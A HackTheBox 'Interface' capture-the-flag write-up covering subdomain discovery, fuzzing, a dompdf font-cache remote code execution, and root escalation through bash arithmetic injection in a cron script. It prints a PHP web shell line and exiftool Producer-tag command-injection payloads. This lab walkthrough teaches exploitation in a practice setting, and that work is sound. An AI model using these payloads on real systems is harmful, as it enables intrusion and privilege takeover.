HackTheBox — Interface

5 min readMay 13, 2023

Interface, a medium rated linux machine involved finding an api subdomain from the CSP header, fuzzing for endpoints, it had dompdf which was vulnerable to rce by loading a css having malicious php giving us a shell as www-data, with pspy we can see a bash script running as root, the script was using a comparison which is similar to eval which can lead to executing arbitrary commands.


Nmap scan report for
Host is up (0.38s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)
| 256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
|_ 256 cc62905560a658629e6b80105c799b55 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Site Maintenance
|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


The webserver shows a note on the site about some maintenance

Fuzzing for files and directories using dirsearch

It didn’t find anything from fuzzing, on checking the response headers it has some sites being shown out of which there’s prd.m.rendering-api.interface.htb

Here I tried fuzzing but again there were no results other than `vendor` so fuzzing there again to see if there’s something accessible

This found `/dompdf` but it’s giving us 403

Since this is an api from what the subdomain tells us, let’s try fuzzing on /api for POST requests


For sending a POST request to html2pdf I struggled a lot in finding a proper way to send POST requests and documentation didn't really included that, so we can try fuzzing for parameter, I went with using wfuzz for this and used Content-Type as json to find the parameter

wfuzz -X POST -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u 'http://prd.m.rendering-api.interface.htb/api/html2pdf/' -H 'Content-Type: application/json' -d'{"FUZZ":"test"}' --hh 36

With this request we’ll be able to convert HTML to PDF

Dompdf is vulnerable to remote code execution through loading css which then loads the font that is cached

We have our css file which is loading the font that is actually a php file executing phpinfo() and from the article it explains that dompdf excepts any file extension as long as header belongs to a font file

@font-face {

And we have the malicious font file

We need to load a css with from our machine so sending a request with href

<link rel=stylesheet href=''>"

To access the cached php font file we need to visit this url to access our cached font php file


To calculate the hash of the url

So the url becomes


We can now get rce by just adding <?php system($_GET['cmd']);?>

With php we can get reverse shell


Privilege Escalation (root)

Running pspy we see a bash script /usr/local/sbin/cleancache.sh being ran as root user

Checking the bash script

#! /bin/bash           
for cfile in "$cache_directory"/*; do
if [[ -f "$cfile" ]]; then
meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
if [[ "$meta_producer" -eq "dompdf" ]]; then
echo "Removing $cfile"
rm "$cfile"

It’s running /tmp directory where it's checking for files and exiftool is looking for Producer tag in the files and comparing it with -eq if it's dompdf and if it, it will delete that file, I checked the version of exiftool which was 12.55 and there wasn’t any reported vulnerability for this version

The vulnerability here is bash’s eval which can allow arbitrary code to be executed

"$meta_producer" -eq "dompdf"

Testing out if we’ll get the output of id command by including it in Producer meta data

exiftool -Producer='a[$(id)]+dompdf' ./export.pdf

This works but we can’t really use spaces here as the Producer meta data is being separated with cut on a space so instead I created a bash script having the reverse shell

exiftool -Producer='a[$(/dev/shm/uwu.sh)]+dompdf' ./export.pdf

After transferring the file, wait for the cronjob to trigger the script